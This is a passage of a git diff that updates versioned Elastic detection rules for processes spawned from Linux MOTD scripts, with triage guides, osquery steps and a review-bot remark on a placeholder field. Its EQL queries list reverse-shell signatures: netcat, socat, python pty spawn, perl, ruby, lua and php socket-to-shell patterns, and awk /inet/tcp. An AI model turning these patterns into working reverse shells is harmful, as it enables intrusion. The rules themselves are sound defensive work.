\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"linux\" and \nevent.type == \"start\" and event.action : (\"exec\", \"exec_event\") and\nprocess.parent.executable : (\"/etc/update-motd.d/*\", \"/usr/lib/update-notifier/*\") and\nprocess.executable : (\"*sh\", \"python*\", \"perl\", \"php*\")\n", "references": [ "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd" @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_4.json b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_4.json index 8f94c47ab1d..7342e452fcc 100644 --- a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_4.json +++ b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_4.json 
@@ -12,7 +12,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Suspicious Process Spawned from MOTD Detected",
- "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "process where host.os.type == \"linux\" and \nevent.type == \"start\" and event.action : (\"exec\", \"exec_event\") and\nprocess.parent.executable : (\"/etc/update-motd.d/*\", \"/usr/lib/update-notifier/*\") and\nprocess.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"perl\", \"php*\", \"nc\", \"ncat\", \n\"netcat\", \"socat\", \"lua\", \"java\", \"openssl\", \"ruby\", \"telnet\", \"awk\")\n",
 "references": [
 "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd"
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_5.json b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_5.json
index 0030c90a2c1..b04953471db 100644
--- a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_5.json
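Review bot: The investigation guide on the new `note` line points its first osquery step at `{{file.path}}`, but the rule's query (unchanged context in this hunk) matches process events (`process where ... event.type == "start"`), and an alert produced from such an event is unlikely to carry a `file.path` value, so the placeholder will probably render empty when the guide is run. The file that step wants to inspect is the MOTD script itself, which the query already identifies as `process.parent.executable`; `SELECT * FROM file WHERE path = {{process.parent.executable}}` would be populated from every alert this rule raises. The same placeholder appears in the `_5.json` hunk below and in the `_6.json` note, so the correction belongs in the rule source these versioned snapshots are generated from rather than in the snapshots alone.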
@@ -12,7 +12,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Suspicious Process Spawned from MOTD Detected",
- "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "process where host.os.type == \"linux\" and \nevent.type == \"start\" and event.action : (\"exec\", \"exec_event\") and\nprocess.parent.executable : (\"/etc/update-motd.d/*\", \"/usr/lib/update-notifier/*\") and\nprocess.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"perl\", \"php*\", \"nc\", \"ncat\", \n\"netcat\", \"socat\", \"lua\", \"java\", \"openssl\", \"ruby\", \"telnet\")\n",
 "references": [
 "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd"
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_6.json b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_6.json
index 4a0b5587d9d..dd903d13b6d 100644
--- a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_6.json
@@ -12,8 +12,8 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Suspicious Process Spawned from MOTD Detected",
- "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
- "query": "process where event.type == \"start\" and event.action : (\"exec\", \"exec_event\") and\nprocess.parent.executable : (\"/etc/update-motd.d/*\", \"/usr/lib/update-notifier/*\") and (\n (process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.args : (\"-i\", \"-l\")) or (process.parent.name == \"socat\" and process.parent.args : \"*exec*\"))) or\n (process.name : (\"nc\", \"ncat\", \"netcat\", \"nc.openbsd\") and process.args_count \u003e= 3 and \n not process.args : (\"-*z*\", \"-*l*\")) or\n (process.name : \"python*\" and process.args : \"-c\" and process.args : (\n \"*import*pty*spawn*\", \"*import*subprocess*call*\"\n )) or\n (process.name : \"perl*\" and process.args : \"-e\" and process.args : \"*socket*\" and process.args : (\n \"*exec*\", \"*system*\"\n )) or\n (process.name : \"ruby*\" and process.args : (\"-e\", \"-rsocket\") and process.args : (\n \"*TCPSocket.new*\", \"*TCPSocket.open*\"\n )) or\n (process.name : \"lua*\" and process.args : \"-e\" and process.args : \"*socket.tcp*\" and process.args : (\n \"*io.popen*\", \"*os.execute*\"\n )) or\n (process.name : \"php*\" and process.args : \"-r\" and process.args : \"*fsockopen*\" and process.args : \"*/bin/*sh*\") or \n (process.name : (\"awk\", \"gawk\", \"mawk\", \"nawk\") and process.args : \"*/inet/tcp/*\") or \n (process.name in (\"openssl\", \"telnet\"))\n) and \nnot (process.parent.args : \"--force\" or process.args : (\"/usr/games/lolcat\", \"/usr/bin/screenfetch\"))\n",
+ "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe 
message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
